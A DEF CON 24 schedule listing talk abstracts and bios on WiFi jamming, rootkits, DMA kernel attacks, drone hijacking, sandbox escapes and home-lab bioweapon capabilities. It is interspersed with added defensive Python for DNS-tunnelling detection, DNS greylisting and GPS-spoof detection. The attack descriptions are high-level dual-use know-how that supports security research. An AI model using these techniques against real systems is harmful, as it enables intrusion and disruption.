Nikita works to ensure DEF CON runs as smoothly as one can expect from a hacker conference. In addition to planning a vast array of details prior to DEF CON and thwarting issues while onsite, she also serves as the Director of Call For Papers and Workshops. In this role she systematically processes hundreds of submissions, organizes the CFP Board, and manages the entire CFP process from beginning to end. While no one relishes the job of rejecting submissions, Nikita strives to make the experience more positive with personal feedback and alternative speaking opportunities. Once talks have been selected, she weaves the final list into a comprehensive four day schedule over multiple speaking tracks. She serves as a primary point-of-contact for speakers leading up to DEF CON and acts as a liaison between speakers, press, and social media content organizers. Beyond the CFP, Nikita also works full-time on various behind-the-scenes administration and project management for DEF CON. As a DEF CON goon for the past 13 years, her superpowers involve putting out fires before they spark and juggling a multitude of tasks while balancing on an over-inflated ball. - rkut nefr ldbj gtjd bjws oayh qtmf york uykr fqwx awtr kumf giwk nxtw -
Twitter: @Niki7a
Demolabs - Table 5 - Saturday - 12:00-13:50
DEF CON Wireless Collection Service (DCWCS)
darkmatter
Lots of information is encoded on electromagnetic radiation, especially WiFi. The aim of this project is to listen to the WiFi bands (2.4 GHz/5 GHz) and see if we pick up anything interesting during DEF CON. This presentation will discuss the hardware decisions, what software is used and how to build and configure your own WiFi monitoring devices so you too can begin passive mass surveillance using WiFi. And yes, we are listening.
darkmatter is a hardware and software hacker. His skills include generating electron-hole pairs, reverse engineering, web stuff, rainbow team 4, and wifi. He thinks he's a computer scientist.
Paris - Le Bar Du Sport - Friday - 18:00-18:59
DEFCON 24 Meetup for /r/Defcon - Date and Time
Here are the details, ya filthy hackers:
Location: Le Bar Du Sport (Right by the sports book), Paris Hotel & Casino
Date: Friday, August 5th, 2016
Time: 6:00pm
I will gather some chairs in the corner of the bar, closest to the sports book. Just ask around for me, I promise not to bite.
BHV - Skyview 4 - Saturday - 18:30-18:59
Speaker: Christian and Erin
@cdameffMDDr
About Christian and Erin:
Christian "quaddi" Dameff MD MS
Christian (quaddi) Dameff is an emergency medicine physician, former open capture the flag champion, prior DEF CON speaker, and researcher. Published works include topics such as therapeutic hypothermia after cardiac arrest, novel drug targets for myocardial infarction patients, and other Emergency Medicine related works with an emphasis on CPR optimization. Security research topics including hacking critical healthcare infrastructure and medical devices. This is his thirteenth DEF CON.
Erin Hefley is a resident physician in her final year of training with the Phoenix Integrated Residency in Obstetrics & Gynecology. She has a background in public health and women's health, and obtained a Master of Public Health degree from the University of Northern Colorado prior to attending medical school at the University of Arizona - Phoenix. This is her 6th Defcon attendance over the past decade, and she is thrilled to have witnessed the development and expansion of the Biohacking Village. Her current interests include reproductive health technology, women's health policy, running, and vampire erotica.
Abstract:
An estimated 30 million Americans and 300 million people worldwide suffer from genetic disease, and 15% of American couples are affected by infertility. Current assisted reproductive technology is used to prevent genetic disease and assist with conception. Human capabilities are rapidly advancing past the present application of these technologies, providing exciting possibilities for selecting and enhancing characteristics of our offspring in the brave new world of 21st century medicine.
This discussion will outline current reproductive science in the US and abroad, and discuss the bioethical, legal, and medical consequences of a future where babies can be designed to specification.
Wireless - Skyview 1 - Friday - 14:00-14:50
Matt Trimble (dEM)
Bio
Matt Trimble is the Global Cyber Security Team Manager for Barracuda Networks. Matt's duties include Barracuda Networks' product security testing, Bug Bounty, Red Team, and CIRT. Matt spends most of his time leading his team of miscreants in trying to make the Internet a safer place for its denizens.
When Matt isn't putting out the latest Internet fire, he enjoys spending time with his wife and four kids. He enjoys hiking, jogging, and biking. Matt also enjoys hacking challenges. In 2015, Matt was on the team that won the DefCon Wireless CTF.
Eric Escobar (JusticeBeaver)
Bio
Eric Escobar is a Security Engineer at Barracuda Networks. His interests are broad and generally include putting computers in places you wouldn't expect. From chicken coops to rockets and even bee hives. Before being called to the dark side, Eric procured a Bachelor's and Master's degree in Civil Engineering. He now enjoys all things wireless, from WiFi, to SDR, and Ham Radio. Last year his team placed 1st in DEF CON 23's Wireless CTF.
Evil ESP
Abstract
This talk will be on using the ESP8266 (ESP) WiFi module for nefariously awesome purposes. We intend to perform live demonstrations of the ESP in action and demonstrate how easy it can be to program (once you know how). The goal is to show how game changing a disposable (less than $3) WiFi device with extremely low power draw can be for the security community.
The talk will begin with an overview of what the ESP is, how to program it, and some history about the device. We will touch on our trials and tribulations in translating the documentation and how, to a large extent, this is no longer needed.
We will demonstrate using the ESP as a quick and dirty WiFi jamming device using both AP BSSID cloning and de-auth injection. A note will be made that this should only be done for research purposes, as it may be considered radio jamming by the FCC, and thus illegal. We will talk about why both troubleshooting what is occurring and finding the device responsible for the attack are difficult. We will show a demonstration of an ESP-based de-auth-o-matic.
We will then build on the previous topics and discuss the ESP's use as a disposable Evil Twin. We will demonstrate using the ESP as an evil AP in a fictitious attack in a residential setting.
We will show how combining an ESP with other low cost IoT devices like the HopeRF transceiver can drastically increase the breadth of its capabilities. We will demonstrate a remote controlled de-auth device and how this decreases the risk to someone cracking a WiFi network.
We will close with a discussion that builds on the previous topics. We will discuss using the ESP as a disposable node in a low cost mass surveillance mesh network.
We will end with a Q&A session.
Detecting and Finding Rogue Access Points
Abstract
Rogue access points are a security concern for businesses, individuals, and muggles alike. The ability to detect and find a rogue access point is an invaluable skill to add to your hacker utility belt. This presentation will discuss how to detect rogue access points (APs) and what to do once you've detected one. We'll discuss inexpensive tools to add to your bag (once the Amazon drone has delivered them), including types of antennas, network adapters and some other odds and ends to round out your toolbox.
Once we've covered some of the basics and outfitted your bag, we'll chat about techniques you can use to find that rogue AP, whether that be wardriving your neighborhood or suiting up your pet with tech. This talk will cover tactics we've used to Find the Fox at the past couple of wireless capture the flag competitions, and even how to create a pretty heat map of wireless access points in your neighborhood. We'll talk about tactics we've used in the field and all the ways we've messed it up.
DEFCON - Track Three - Saturday - 10:00-10:59
Developing Managed Code Rootkits for the Java Runtime Environment
Benjamin Holland ISU Team, DARPA's Space/Time Analysis for Cybersecurity (STAC)
Managed Code Rootkits (MCRs) are terrifying post-exploitation attacks that open the doors for cementing and expanding a foothold in a target network. While the concept isn't new, practical tools for developing MCRs don't currently exist. Erez Metula released ReFrameworker in 2010 with the ability to inject attack modules into the C# runtime, paving the way for MCRs, but the tool requires the attacker to have knowledge of intermediate languages, does not support other runtimes, and is no longer maintained. Worse yet, the ‘write once, run anywhere’ motto of managed languages is violated when dealing with runtime libraries, forcing the attacker to write new exploits for each target platform.
This talk debuts a free and open source tool called JReFrameworker aimed at solving the aforementioned challenges of developing attack code for the Java runtime while lowering the bar so that anyone with rudimentary knowledge of Java can develop a managed code rootkit. With Java being StackOverflow's most popular server side language of 2015 the Java runtime environment is a prime target for exploitation. JReFrameworker is an Eclipse plugin that allows an attacker to write simple Java source to develop, debug, and automatically modify the runtime. Best of all, working at the intended abstraction level of source code allows the attacker to ‘write once, exploit anywhere’. When the messy details of developing attack code are removed from the picture the attacker can let his creativity flow to develop some truly evil attacks, which is just what this talk aims to explore.
Ben Holland is a PhD student at Iowa State University with experience working on two high profile DARPA projects. He has extensive experience writing program analyzers to detect novel and sophisticated malware in Android applications and served on the ISU team as a key analyst for DARPA's Automated Program Analysis for Cybersecurity (APAC) program. He's lectured on security topics for university courses in program analysis and operating system principles. Ben has given multiple talks at professional clubs as well as security and academic conferences. His past work experience has been in research at Iowa State University, mission assurance at MITRE, government systems at Rockwell Collins, and systems engineering at Wabtec Railway Electronics. Ben holds a M.S. degree in Computer Engineering and Information Assurance, a B.S. in Computer Engineering, and a B.S. in Computer Science. Currently he serves on the ISU team for DARPA's Space/Time Analysis for Cybersecurity (STAC) program.
Twitter: @daedared
ben-holland.com
DEFCON - Track Three - Friday - 14:00-14:59
Direct Memory Attack the Kernel
Ulf Frisk Penetration Tester
Inexpensive universal DMA attacking is the new reality of today! In this talk I will explore and demonstrate how it is possible to take total control of operating system kernels by DMA code injection. Once control of the kernel has been gained I will execute code and dump gigabytes of memory in seconds. Full disk encryption will be defeated, authentication will be bypassed and shells will be spawned. This will all be made possible using a $100 piece of hardware together with the easy to use modular PCILeech toolkit - which will be published as open source after this talk.
Ulf Frisk is a penetration tester working in the Swedish financial sector. Ulf focuses mainly on online banking security solutions, penetration testing and IT security audits during the daytime and low-level coding during the nighttime. Ulf has been working professionally with security since 2011 and has a dark past as a developer.
Twitter: @UlfFrisk
GitHub: github.com/ufrisk
Demolabs - Table 5 - Saturday - 10:00-11:50
Dirt Simple Comms v2 (DSC2)
Tyler Oderkirk
Scott Carlson
Secure decentralized wireless text messaging using the Raspberry Pi Zero and LoRA modulation in the 900MHz band.
Tyler Oderkirk Fullstack Computer Security Engineer
Scott Carlson Systems Engineer (Mechatronics)
Demolabs - Table 3 - Saturday - 10:00-11:50
Disable Single Step Debug with Xmode Code
Ke Sun
Ya Ou
Single step execution is a very important debug function in modern computer programming for effective and efficient troubleshooting. How to stop single stepping is also a critical research topic from an anti-debug perspective. During our research on xmode code obfuscation (code with a runtime 32-bit/64-bit mode switch), we found a very interesting point: WinDbg is not able to properly carry out the single step command under certain situations. We wondered what the reason behind it was. Is it a WinDbg bug, or is it due to something else? We made an in-depth investigation to answer these questions.
This open-source project will demonstrate how to disable single step debugging in WinDbg with xmode code. We will also reveal the details of this issue from a system perspective.
Ke Sun is an independent security researcher. He focuses on malware analysis and reverse engineering. Dr. Sun graduated from UCLA.
Ya Ou is an independent security researcher. His work has been focusing on new exploit development, malware analysis, and reverse engineering.
DEFCON - Track Two - Sunday - 11:00-11:59
Discovering and Triangulating Rogue Cell Towers
JusticeBeaver (Eric Escobar) Security Engineer, Barracuda Networks Inc
The number of IMSI-catchers (rogue cell towers) in use by hackers and governments around the world has been steadily increasing. Rogue cell towers, which can be as small as your home router, pose a large security risk to anyone with a phone. If in range, your phone will automatically connect to the rogue tower with no indication to you that anything has happened. At that point, your information passes through the rogue tower and can leak sensitive information about you and your device. Currently, there are no easy ways to protect your phone from connecting to a rogue tower (aside from some Android apps which are phone specific and require root access). In this talk I'll demonstrate how you can create a rogue cell tower detector using generic hardware available from Amazon. The detector can identify rogue towers and triangulate their location. The demonstration uses a software defined radio (SDR) to fingerprint each cell tower and determine the signal strength of each tower relative to the detector. With a handful of these detectors working together, you can identify when a rogue cell tower enters your airspace, as well as identify the signal strength relative to each detector. This makes it possible to triangulate the source of the new rogue cell tower.
JusticeBeaver (Eric Escobar) is a Security Engineer at Barracuda Networks. His interests are broad and generally include putting computers in places you wouldn't expect. From chicken coops to rockets and even bee hives. Before being called to the dark side, Eric procured a Bachelor's and Master's degree in Civil Engineering. He now enjoys all things wireless, from WiFi, to SDR, and Ham Radio. Last year his team placed 1st in DEF CON 23's Wireless CTF.
DEFCON - Track Two - Saturday - 16:00-16:59
DIY Nukeproofing: A New Dig at 'Datamining'
3AlarmLampScooter Hacker
Does the thought of nuclear war wiping out your data keep you up at night? Don't trust third party data centers? Few grand burning a hole in your pocket and looking for a new Sunday project to keep you occupied through the fall? If you answered yes to at least two out of three of these questions, then 3AlarmLampscooter's talk on extreme pervasive communications is for you! You'll learn everything from calculating radiation half layer values to approximating soil stability involved in excavating your personal apocalypse-proof underground data fortress.
3AlarmLampScooter is an enigmatic armored mammal of the genus homo sapiens sapiens sapiens troglodyte found in caves and tunnels across the southeastern United States. As moderator of the subreddit /r/Neutron, 3AlarmLampscooter's enunciation espouses pervasive communication via excavation to protect from radiation and conflagration. When above-ground, 3AlarmLampscooter is a vocal transhumanism advocate developing 3D printed construction materials.
Reddit: /u/3AlarmLampScooter
BHV - Skyview 4 - Saturday - 13:00-13:59
Speaker: Meow Ludo Meow Meow
About Meow Ludo Meow Meow:
Meow-Ludo is the founder of biohacking in Australia, and works full time running BioFoundry. He is a full-time hacker, part-time federal political candidate, and is interested in interdisciplinary projects. He is interested in the ability of biohackers to create bioweapons and the regulations that aim to control them.
Abstract:
Meow will be presenting on the capabilities for biological weapons that are currently able to be produced in home or community bio labs. He will explore the role that emerging technologies play in drastically reducing the technological and cost barriers to creating these constructs, and suggest ways that legislation and regulation may be employed to ensure maximum freedoms and innovation coupled with effective monitoring. Make sure to get your vaccinations before attending please.
Demolabs - Table 2 - Saturday - 14:00-15:50
DNS Analyse
John Heise
Want to know who was patient zero in that recent phishing campaign? Or what is going through that SSH tunnel? DNS is an integral part of all Internet traffic, benign and malicious, yet it is often ignored in network monitoring in favour of more active protocols such as HTTP. This is a major mistake: a large amount of intelligence can be gathered from this single source. DNS traffic can easily be used to determine information about hosts and users on a network, and it is an essential tool for defending a network.
Using packet sniffing libraries and open source queueing and storage projects, a flexible monitoring system can be assembled relatively easily. With this tool in hand and some simple RPZs (Response Policy Zones), a security engineer can have more impact than most network analysis and prevention products on the market.
This presentation will walk through a design for a DNS monitoring system, then show how that system can be used to watch for malware traffic, data exfiltration over DNS, and traffic tunnelled through SSH, and finally how it can feed RPZs as a defensive mechanism.
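As an added illustration of the kind of system described above (this is editor-written example code, not John Heise's DNS Analyse tool), the script below takes a DNS query log, finds the first internal client that resolved a phishing domain (patient zero), flags zones that receive long, high-entropy subdomain labels (the fingerprint of data encoded into DNS), and emits RPZ records for them. The log lines and the `<epoch> <client_ip> <qname> <qtype>` format are constructed for the example; a production version would use the public suffix list instead of the naive last-two-labels zone split.

```python
"""Added example (not the DemoLab's code): a passive DNS monitor that
finds patient zero for a phishing domain, flags DNS tunnelling by
subdomain entropy, and emits RPZ records.  Log lines are constructed;
the log format '<epoch> <client_ip> <qname> <qtype>' is an assumption."""
import math
import re
from collections import Counter, defaultdict

SAMPLE_LOG = """\
1469462400 10.0.0.5 www.example.com A
1469462410 10.0.0.7 login-secure-update.example.net A
1469462415 10.0.0.5 login-secure-update.example.net A
1469462420 10.0.0.9 mail.example.com MX
1469462430 10.0.0.7 a8f3b2c19e7d4f60b1c2d3e4f5a6b7c8.tunnel.example.org TXT
1469462431 10.0.0.7 9b2e7c41d0a3f8e6c5b4a39281706f5e.tunnel.example.org TXT
1469462432 10.0.0.7 c7d1e9f20b4a6c83d5e7f9a1b3c5d7e9.tunnel.example.org TXT
1469462440 10.0.0.5 www.example.com A
"""

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_log(text):
    """Yield (ts, client, qname, qtype); qname lower-cased without trailing dot."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, client, qname, qtype = m.groups()
            yield int(ts), client, qname.lower().rstrip("."), qtype


def patient_zero(records, domain):
    """First client that resolved `domain` or any name beneath it."""
    suffix = "." + domain
    hits = [(ts, c) for ts, c, q, _ in records if q == domain or q.endswith(suffix)]
    return min(hits)[1] if hits else None


def shannon_entropy(s):
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def tunnel_suspects(records, min_entropy=3.5, min_label_len=24, min_queries=3):
    """Zones that received >= min_queries queries whose leftmost label is
    long and high-entropy: data being encoded into subdomains."""
    per_zone = defaultdict(int)
    for _, _, q, _ in records:
        labels = q.split(".")
        if len(labels) < 3:
            continue
        first = labels[0]
        if len(first) >= min_label_len and shannon_entropy(first) >= min_entropy:
            per_zone[".".join(labels[1:])] += 1
    return sorted(z for z, n in per_zone.items() if n >= min_queries)


def rpz_records(domains, action="."):
    """RPZ policy lines for `name` and `*.name`; CNAME '.' means NXDOMAIN."""
    out = []
    for d in domains:
        out.append(f"{d}\tCNAME\t{action}")
        out.append(f"*.{d}\tCNAME\t{action}")
    return out


if __name__ == "__main__":
    recs = list(parse_log(SAMPLE_LOG))
    print("patient zero:", patient_zero(recs, "login-secure-update.example.net"))
    bad = tunnel_suspects(recs)
    print("tunnel zones:", bad)
    print("\n".join(rpz_records(bad)))
```

The emitted lines drop straight into an RPZ zone file served to the resolver; the wildcard owner is what makes the policy cover every encoded subdomain rather than the one name that was seen.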
John Heise did operations work for many years prior to joining the LinkedIn Security team. John has also been involved in organizing Hack Fortress since its inception in 2010.
Return to Index
SkyTalks - Skyview 3 - Friday - 11:00-11:59
Speaker: Munin
Talk: DNS Greylisting for Phun and Phishing Prevention
Phishing is a loathsome and irritating problem for ops personnel everywhere, and user education only goes so far. Given that most users typically visit only a handful of domains in a day, and given that most phishing domains last only about 24 hours, bringing the notion of greylisting from the email world to your local DNS resolver seems a good fit.
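The policy the abstract sketches, written out as an added example (editor's code, not Munin's): a registered domain the resolver has never seen is refused for a delay after first sight, and allowed once the delay has elapsed. Legitimate sites cost the user one retry; a phishing domain that lives a day loses part of its window, and the first-seen table doubles as a log of which new domains users tried to reach. The 15-minute delay, the allowlist, and the last-two-labels zone key are assumptions for the example; a resolver would return SERVFAIL for a grey answer so clients retry.

```python
"""Added example, not the speaker's code: a greylist policy for a local
resolver.  A never-seen registered domain is 'grey' (to be answered with
SERVFAIL) for DELAY seconds after first sight, then allowed."""
import time

DELAY = 15 * 60  # seconds a new domain stays grey (assumption; tune locally)


class Greylist:
    def __init__(self, delay=DELAY, allowlist=()):
        self.delay = delay
        self.first_seen = {}          # zone -> time of first query
        self.allowlist = set(allowlist)

    @staticmethod
    def key(qname):
        """Greylist on the registered domain (naive last-two-labels; use the
        public suffix list in production) so subdomains share one entry."""
        labels = qname.lower().rstrip(".").split(".")
        return ".".join(labels[-2:])

    def decide(self, qname, now=None):
        """Return 'allow' or 'grey' for a query arriving at time `now`."""
        now = time.time() if now is None else now
        k = self.key(qname)
        if k in self.allowlist:
            return "allow"
        seen = self.first_seen.setdefault(k, now)
        return "allow" if now - seen >= self.delay else "grey"


def simulate():
    """Constructed sequence of queries against one greylist instance."""
    g = Greylist(allowlist=["example.com"])
    t0 = 1_000_000
    return [
        g.decide("www.example.com", t0),                # allowlisted
        g.decide("login-update.example.net", t0),        # first sight -> grey
        g.decide("login-update.example.net", t0 + 60),   # still inside delay
        g.decide("cdn.example.net", t0 + DELAY),         # same zone, aged -> allow
    ]


if __name__ == "__main__":
    print(simulate())
```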
Return to Index
SE - Palace 2-5 - Friday - 16:00-16:55
Tomohisa Ishikawa
Tomohisa Ishikawa is a Japanese IT security consultant with seven years of experience. He specializes in penetration testing, incident response, vulnerability management, secure development, and security education. He has led many domestic and international IT security consulting projects and has taught security essentials, secure programming, and secure design on many occasions. He holds a Bachelor of Arts in Computer Science and several certifications, including CISSP, CISA, CISM, CFE, QSA and GIAC (GPEN, GWAPT, GXPN, GWEB, GSNA, GREM, and GCIH). He is also in a doctoral program working toward his Ph.D.
Return to Index
Wireless - Skyview 1 - Saturday - 13:00-13:50
Arthur Garipov
Bio
Arthur Garipov is a network application security specialist at Positive Technologies. He researches the security of wireless technologies, mobile systems and IoT, and is the organizer of the MiTM Mobile and Drone Quest contests and workshops at PHDays V and VI.
@chopengauer
Drone Hijacking and other IoT hacking with GNU Radio and XTRX SDR
Abstract
The Internet of Things is all around us. Is it secure, or does its security rest on (presumed) invisibility? XTRX SDR (software-defined radio) and GNU Radio can answer these questions. In this presentation we will play with some modern wireless devices. They use similar protocols, and none of them encrypts its traffic. We will show how easy it is to find them using XTRX SDR and proprietary chipsets, and how to sniff, intercept and fuzz these devices using a small Python script and GNU Radio. As examples we will show a MouseJack attack against wireless dongles, a wireless keyboard keylogger, and even a drone hijacking.
Return to Index
DEFCON - Track Two - Sunday - 13:00-13:59
Drones Hijacking - multi-dimensional attack vectors and countermeasures
Aaron Luo Security Expert, Trend Micro
Drone-related applications have sprung up in recent years, and drone security has become a hot topic in the security industry. This talk will introduce general security issues of drones, including vulnerabilities in the radio signals, WiFi, chipset, FPV system, GPS, app, and SDK. The most famous and popular drone product will be used to demonstrate the vulnerabilities in each of these areas, along with recommended countermeasures. The talk will also demo how to take control of the drone through these vulnerabilities.
Hacking by faking GPS signals has been presented before at Black Hat and DEF CON; this talk extends the topic to drone security. We will demo the real-time hijacking program we created for various drones, which can take full control of the drone's manoeuvres from simple keyboard input. In addition, we will introduce how to detect fake GPS signals.
An open source tool supporting u-blox GPS modules and SDR to detect fake GPS signals will be shared and published on GitHub.
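The abstract promises a fake-GPS detector but does not describe it. As an added example (editor's code, not the tool Aaron Luo is publishing), the script below applies two plausibility checks to NMEA sentences of the kind a u-blox receiver emits: a jump between consecutive fixes that implies an impossible speed, and a set of satellites all reporting the same C/N0, which a single spoofing transmitter produces and a real sky does not. The sentences are constructed (with valid checksums computed by the helper); the 150 m/s and 3 dB thresholds are assumptions to tune per platform.

```python
"""Added example (not Aaron Luo's tool): plausibility checks on NMEA
GGA/GSV sentences that catch two common GPS spoofing artifacts, an
impossible position jump and uniform C/N0 across satellites."""
import math


def nmea(body):
    """Wrap a sentence body with '$' and its XOR checksum."""
    cs = 0
    for ch in body:
        cs ^= ord(ch)
    return f"${body}*{cs:02X}"


def checksum_ok(sentence):
    if not sentence.startswith("$") or "*" not in sentence:
        return False
    body, _, cs = sentence[1:].partition("*")
    return nmea(body)[-2:] == cs.strip().upper()


def dm_to_deg(value, hemi):
    """ddmm.mmmm / dddmm.mmmm to signed decimal degrees."""
    v = float(value)
    deg = int(v // 100)
    d = deg + (v - deg * 100) / 60.0
    return -d if hemi in ("S", "W") else d


def parse_gga(fields):
    """(seconds since midnight, lat, lon) from a GGA field list."""
    hh, mm, ss = fields[1][:2], fields[1][2:4], fields[1][4:]
    t = int(hh) * 3600 + int(mm) * 60 + float(ss)
    return t, dm_to_deg(fields[2], fields[3]), dm_to_deg(fields[4], fields[5])


def parse_gsv(fields):
    """C/N0 values (dB-Hz) of the satellites in one GSV sentence."""
    snrs = []
    for i in range(4, len(fields), 4):
        group = fields[i:i + 4]          # prn, elevation, azimuth, snr
        if len(group) == 4 and group[3]:
            snrs.append(int(group[3]))
    return snrs


def haversine_m(lat1, lon1, lat2, lon2):
    r = 6371000.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp, dl = p2 - p1, math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))


def analyze(sentences, max_speed_mps=150.0, min_snr_spread=3):
    """Return a list of alert strings for the sentence stream."""
    alerts = []
    last = None
    for s in sentences:
        if not checksum_ok(s):
            alerts.append(f"bad checksum: {s}")
            continue
        fields = s[1:].split("*")[0].split(",")
        if fields[0].endswith("GGA"):
            t, lat, lon = parse_gga(fields)
            if last is not None and t > last[0]:
                speed = haversine_m(last[1], last[2], lat, lon) / (t - last[0])
                if speed > max_speed_mps:
                    alerts.append(f"position jump {speed:.0f} m/s at {fields[1]}")
            last = (t, lat, lon)
        elif fields[0].endswith("GSV"):
            snrs = parse_gsv(fields)
            if len(snrs) >= 4 and max(snrs) - min(snrs) < min_snr_spread:
                alerts.append(f"uniform C/N0 {snrs[0]} dB-Hz across {len(snrs)} satellites")
    return alerts


# Constructed stream: a genuine track, then a spoofer taking over.
SAMPLE = [
    nmea("GPGGA,120000.00,3617.4132,N,12156.8021,W,1,08,0.9,15.2,M,-31.0,M,,"),
    nmea("GPGSV,2,1,08,01,40,083,41,02,17,308,38,03,07,344,27,04,22,228,33"),
    nmea("GPGGA,120001.00,3617.4140,N,12156.8030,W,1,08,0.9,15.3,M,-31.0,M,,"),
    nmea("GPGGA,120002.00,3700.0000,N,12200.0000,W,1,08,0.9,15.0,M,-31.0,M,,"),
    nmea("GPGSV,2,1,08,01,40,083,45,02,17,308,45,03,07,344,45,04,22,228,45"),
]

if __name__ == "__main__":
    for a in analyze(SAMPLE):
        print(a)
```

Neither check needs the raw RF: both run on the receiver's serial output, which is what makes them cheap to bolt onto a flight controller.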
Aaron Luo is a cyber threat expert in Trend Micro's Core Technology Group. Prior to joining Trend Micro, Aaron worked as a security consultant in a government cybercrime investigation department focusing on malware analysis, network forensics and protocol analysis.
He began his security research in 2005 and is active in the information security communities in Taiwan. He was the founder of the PHATE hacker group and a core member of ZUSO Security. He is now a member of the CHROOT/HITCON security research group and is interested in reverse engineering, developing security attack/defense tools (such as firewalls, HIPS systems, protocol analysis, RATs, shellcode, vulnerability scanners), network forensics, RF, IoT, and penetration testing.
Aaron has published several research papers at HITCON and SYSCAN360, including "The Concept of Game Hacking & Bypassing Game Protection (Hackshield)" at HITCON (Hacks in Taiwan Conference) 2009, when he was just eighteen years old; to this day he remains the youngest speaker ever at HITCON. "Smashing iOS Apps For Fun And Profit" was presented at the first SYSCAN360 (2012).
Return to Index
WOS - Skyview 6 - Saturday - 15:10-15:59
Dynamic Population Discovery for Lateral Movement Detection (Using Machine Learning)
Rod Soto, Senior Security Researcher at Splunk UBA
Joseph Zadeh, Senior Security Data Scientist at Splunk UBA
The focus of this presentation is to describe ways to automate the discovery of different asset classes and behavioral profiles within an enterprise network. We will describe data-driven techniques to derive fingerprints for specific types of individual and subgroup behaviors. The goal of these methods is to add context to communications taking place within an enterprise, and to identify when certain asset profiles change their behavioral fingerprint in a way that indicates compromise. The profiles we want to discover can be tied to human behavior (user fingerprinting) or to particular asset classes like web servers or databases (hardware/software fingerprinting). Finally, enriching these profiles with a small amount of network context lets us break down the behaviors across different parts of the network topology.
These techniques become important when we want to passively monitor for certain attacks against servers even without visibility into the logs on the server itself. For example, we will cover the automated discovery and enrichment of DMZ assets and how we use these techniques to profile when a server has been planted with a webshell or when an asset has been used to covertly exfiltrate data. The methods we propose are generic enough to apply to any kind of Layer 4 / Layer 7 traffic, or to PCAP data alone.
Rod Soto (Twitter: @rodsoto) has over 15 years of experience in information technology and security. Currently working as a Security Researcher at Splunk User Behavioral Analytics. He has spoken at ISSA, ISC2, OWASP, DEF CON, Hackmiami, Bsides and also been featured in Rolling Stone Magazine, Pentest Magazine, Univision and CNN. Rod Soto was the winner of the 2012 Black Hat Las Vegas CTF competition and is the founder and lead developer of the Kommand & KonTroll competitive hacking Tournament series.
Joseph Zadeh (Twitter: @josephzadeh) studied mathematics in college and received a BS from the University of California, Riverside and an MS and PhD from Purdue University. While in college, he worked in a Network Operations Center focused on security and network performance baselines, and during that time he spoke at DEF CON and ToorCon. Most recently he joined Caspida as a security data scientist. Previously, Joseph was part of the data science consulting team at Greenplum/Pivotal focused on cyber security analytics, and was also part of Kaiser Permanente's first Cyber Security R&D team.
Return to Index
HHV - Contest Area - Sunday - 12:00-12:59
EagleCAD Basics
Casey
In this class we will go over the very basics of using EAGLE to design a 555 counter circuit. You will design a schematic as well as the circuit board itself. It is not required but will be helpful to know the difference between volts, amps, and ohms. This is a lecture where people can follow along on their own systems, but people are welcome to hang out and just watch/ask questions.
Return to Index
Workshops - Las Vegas Ballroom 6 - Saturday - 10:00-14:00
Embedded system design: from electronics to microkernel development
Rodrigo Maximiano Antunes de Almeida Professor, Federal University of Itajubá
The workshop is an introduction to embedded systems design. We will start by building a simple electronic embedded system, which will be used as the target platform. Later I intend to cover the low-level side of the C language: bit fields, arrays and bitwise operations, pointers to fixed memory addresses/registers, how to access the microcontroller peripherals, etc. These will be the basis for developing a full embedded microkernel in ISO C without the standard libraries. Attendees will gain a better understanding of the relationship between electronics and programming and of how these questions impact kernel development, as well as a deep knowledge of the kernel's basic functions (process scheduling, I/O driver control, etc.).
Rodrigo is a professor at the Federal University of Itajubá. He has 9 years of experience working with embedded systems, developing projects for both home and electro-medical appliances. He currently teaches classes on electronics, microcontrollers and embedded operating systems to electronic engineering students. His research includes hardware development, RTOS security and embedded systems usability. Rodrigo has presented at DEF CON, ESC and BSides conferences, mostly talking about embedded development and related security issues.
Max Class Size: 40
Prerequisites for students: Basic/intermediate C programming knowledge
Materials or Equipment students will need to bring to participate: Just laptops. The electronic material will be provided by me to everyone.
Return to Index
Demolabs - Table 6 - Saturday - 12:00-13:50
Emo-Tool/OldYeller/Ransomware-Simulator
Weston Hecker
Emo and Old Yeller are tools that make your computer immune to 26 different variants of ransomware, including SamSam, Locky, CryptoWall and CryptoLocker. These tools turn the sandbox evasion methods built into the malware against the malware itself: "Emo makes malware kill itself; Old Yeller makes you crash your own system upon infection."
Weston Hecker has 11 years of pen-testing, security research and programming experience. He has spoken at DEF CON 22, 23 and 24 (Las Vegas), HOPE 11, TakedownCON 2016, BSides Boston, Black Hat 2016, Enterprise Connect 2016, ISC2 and SC Congress Toronto. He has worked on several open source tools, including the Skimbad anti-CC-fraud platform, Opencodec, hacker tools such as "CompanyBAN" (an automated AD company-wide lock-out tool), several SDR tools, malware reverse engineering, telephone DDoS tools, and OpenCV. Hardware includes ATM shimmers and anti-skimmers, gas pump (anti-)skimmers and OldyellerUSB.
Return to Index
DEFCON - DEF CON 101 - Saturday - 10:00-10:59
Escaping The Sandbox By Not Breaking It
Marco Grassi KEENLAB of Tencent
Qidan He KEENLAB of Tencent
The main topic of this technical talk is sandboxes and how to escape them. One of the main components of modern operating system security is the sandbox implementation. Android, for example, added SELinux in recent versions to its existing sandbox mechanism as an additional layer of security, and OS X recently added System Integrity Protection as a system-level sandbox in addition to the regular per-process sandbox.
All modern operating systems focus on defense in depth, so attackers and defenders alike must know these mechanisms, whether to bypass them or to make them more secure. We will focus on Android and iOS/OS X, showing the audience the sandbox implementations in these operating systems and the attack surface reachable from within interesting sandboxes, such as the browser sandbox or the application sandbox.
Then we will discuss how to attack them and escape from our restricted context to further compromise the system, showcasing vulnerabilities. We think that comparing Android with iOS/OS X is very interesting since their implementations differ while the goal for attackers and defenders is the same, so knowing different sandboxes is very insightful for highlighting the limitations of a particular implementation. A few years ago sandboxes were mainly a concern for our desktops, mobile phones and tablets, but looking at the technology trend, with automotive and IoT, sandboxes will be crucial in those technologies as well, since they will run on mainstream operating systems as they become more popular.
